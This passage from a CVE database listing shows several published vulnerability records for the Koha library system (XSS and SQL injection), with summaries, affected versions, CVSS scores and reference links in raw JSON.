                "role": "CISA Coordinator",
                "timestamp": "2024-08-06T20:53:58.370756Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-79",
                "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:54:07.974Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via a crafted script to the format parameter."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-08-06T18:47:14.231319",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://febin0x4e4a.wordpress.com/2024/03/07/xss-to-one-click-rce-in-koha-ils/"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2024-28739",
    "datePublished": "2024-08-06T00:00:00",
    "dateReserved": "2024-03-08T00:00:00",
    "dateUpdated": "2024-08-06T20:54:07.974Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2015-4639 (GCVE-0-2015-4639)
Vulnerability from cvelistv5
Published
2017-07-21 14:00
Modified
2024-08-06 06:18
Severity ?
CWE
  • n/a
Summary
Cross-site scripting (XSS) vulnerability in opac-addbybiblionumber.pl in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, and 3.20.x before 3.20.1 allows remote attackers to inject arbitrary web script or HTML via a crafted list name.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T06:18:12.093Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-16-12/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-20-1/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/koha-3-14-16-released/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-06-19T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Cross-site scripting (XSS) vulnerability in opac-addbybiblionumber.pl in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, and 3.20.x before 3.20.1 allows remote attackers to inject arbitrary web script or HTML via a crafted list name."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-18T19:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-16-12/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-20-1/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/koha-3-14-16-released/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-4639",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Cross-site scripting (XSS) vulnerability in opac-addbybiblionumber.pl in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, and 3.20.x before 3.20.1 allows remote attackers to inject arbitrary web script or HTML via a crafted list name."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4",
              "refsource": "CONFIRM",
              "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-16-12/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-16-12/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-20-1/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-20-1/"
            },
            {
              "name": "https://koha-community.org/koha-3-14-16-released/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/koha-3-14-16-released/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-4639",
    "datePublished": "2017-07-21T14:00:00",
    "dateReserved": "2015-06-16T00:00:00",
    "dateUpdated": "2024-08-06T06:18:12.093Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2023-5025 (GCVE-0-2023-5025)
Vulnerability from cvelistv5
Published
2023-09-17 07:00
Modified
2024-08-02 07:44
CWE
  • CWE-79 - Cross Site Scripting
Summary
A vulnerability was found in KOHA up to 23.05.03. It has been declared as problematic. This vulnerability affects unknown code of the file /cgi-bin/koha/catalogue/search.pl of the component MARC. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239866 is the identifier assigned to this vulnerability.
References
https://vuldb.com/?id.239866 (vdb-entry, technical-description)
https://vuldb.com/?ctiid.239866 (signature, permissions-required)
https://www.youtube.com/watch?v=b5107YkpgaM (media-coverage)
Impacted products
Vendor Product Version
n/a KOHA Version: 23.05.03


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:44:53.733Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "technical-description",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.239866"
          },
          {
            "tags": [
              "signature",
              "permissions-required",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?ctiid.239866"
          },
          {
            "tags": [
              "media-coverage",
              "x_transferred"
            ],
            "url": "https://www.youtube.com/watch?v=b5107YkpgaM"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "modules": [
            "MARC"
          ],
          "product": "KOHA",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "23.05.03"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Angel Metz"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "ph03n1xsp (VulDB User)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in KOHA up to 23.05.03. It has been declared as problematic. This vulnerability affects unknown code of the file /cgi-bin/koha/catalogue/search.pl of the component MARC. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239866 is the identifier assigned to this vulnerability."
        },
        {
          "lang": "de",
          "value": "In KOHA bis 23.05.03 wurde eine Schwachstelle ausgemacht. Sie wurde als problematisch eingestuft. Das betrifft eine unbekannte Funktionalit\u00e4t der Datei /cgi-bin/koha/catalogue/search.pl der Komponente MARC. Dank der Manipulation mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk angegangen werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
            "version": "3.1"
          }
        },
        {
          "cvssV3_0": {
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
            "version": "3.0"
          }
        },
        {
          "cvssV2_0": {
            "baseScore": 4,
            "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Cross Site Scripting",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-10-24T19:09:41.254Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "tags": [
            "vdb-entry",
            "technical-description"
          ],
          "url": "https://vuldb.com/?id.239866"
        },
        {
          "tags": [
            "signature",
            "permissions-required"
          ],
          "url": "https://vuldb.com/?ctiid.239866"
        },
        {
          "tags": [
            "media-coverage"
          ],
          "url": "https://www.youtube.com/watch?v=b5107YkpgaM"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2023-09-16T00:00:00.000Z",
          "value": "Advisory disclosed"
        },
        {
          "lang": "en",
          "time": "2023-09-16T00:00:00.000Z",
          "value": "CVE reserved"
        },
        {
          "lang": "en",
          "time": "2023-09-16T02:00:00.000Z",
          "value": "VulDB entry created"
        },
        {
          "lang": "en",
          "time": "2023-10-12T14:58:51.000Z",
          "value": "VulDB entry last update"
        },
        {
          "lang": "en",
          "time": "2023-12-09T00:00:00.000Z",
          "value": "Vendor informed"
        },
        {
          "lang": "en",
          "time": "2023-12-09T00:00:00.000Z",
          "value": "Vendor acknowledged"
        }
      ],
      "title": "KOHA MARC search.pl cross site scripting"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2023-5025",
    "datePublished": "2023-09-17T07:00:07.258Z",
    "dateReserved": "2023-09-16T08:19:19.064Z",
    "dateUpdated": "2024-08-02T07:44:53.733Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2014-1925 (GCVE-0-2014-1925)
Vulnerability from cvelistv5
Published
2020-01-24 16:42
Modified
2024-08-06 09:58
Severity ?
CWE
  • n/a
Summary
SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T09:58:15.638Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://koha-community.org/security-release-february-2014/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-02-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-01-24T16:42:51",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://koha-community.org/security-release-february-2014/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-1925",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://koha-community.org/security-release-february-2014/",
              "refsource": "MISC",
              "url": "http://koha-community.org/security-release-february-2014/"
            },
            {
              "name": "http://www.openwall.com/lists/oss-security/2014/02/07/10",
              "refsource": "MISC",
              "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
            },
            {
              "name": "http://www.openwall.com/lists/oss-security/2014/02/10/3",
              "refsource": "MISC",
              "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
            },
            {
              "name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666",
              "refsource": "MISC",
              "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-1925",
    "datePublished": "2020-01-24T16:42:51",
    "dateReserved": "2014-02-09T00:00:00",
    "dateUpdated": "2024-08-06T09:58:15.638Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2014-9446 (GCVE-0-2014-9446)
Vulnerability from cvelistv5
Published
2015-01-02 20:00
Modified
2024-09-16 18:54
Severity ?
CWE
  • n/a
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T13:47:41.022Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://koha-community.org/koha-3-16-6-release/"
          },
          {
            "name": "71803",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/71803"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://koha-community.org/koha-3-18-2-release/"
          },
          {
            "name": "61187",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/61187"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2015-01-02T20:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://koha-community.org/koha-3-16-6-release/"
        },
        {
          "name": "71803",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/71803"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://koha-community.org/koha-3-18-2-release/"
        },
        {
          "name": "61187",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/61187"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-9446",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://koha-community.org/koha-3-16-6-release/",
              "refsource": "CONFIRM",
              "url": "http://koha-community.org/koha-3-16-6-release/"
            },
            {
              "name": "71803",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/71803"
            },
            {
              "name": "http://koha-community.org/koha-3-18-2-release/",
              "refsource": "CONFIRM",
              "url": "http://koha-community.org/koha-3-18-2-release/"
            },
            {
              "name": "61187",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/61187"
            },
            {
              "name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425",
              "refsource": "CONFIRM",
              "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-9446",
    "datePublished": "2015-01-02T20:00:00Z",
    "dateReserved": "2015-01-02T00:00:00Z",
    "dateUpdated": "2024-09-16T18:54:07.207Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2015-4633 (GCVE-0-2015-4633)
Vulnerability from cvelistv5
Published
2018-10-18 20:00
Modified
2024-08-06 06:18
Severity ?
CWE
  • n/a
Summary
Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T06:18:12.102Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-16-12/"
          },
          {
            "name": "37387",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/37387/"
          },
          {
            "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-18-8/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-20-1/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/koha-3-14-16-released/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-06-25T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-18T19:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-16-12/"
        },
        {
          "name": "37387",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/37387/"
        },
        {
          "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-18-8/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-20-1/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/koha-3-14-16-released/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-4633",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
            },
            {
              "name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
              "refsource": "MISC",
              "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
            },
            {
              "name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
              "refsource": "MISC",
              "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-16-12/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-16-12/"
            },
            {
              "name": "37387",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/37387/"
            },
            {
              "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
              "refsource": "FULLDISC",
              "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-18-8/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-18-8/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-20-1/",
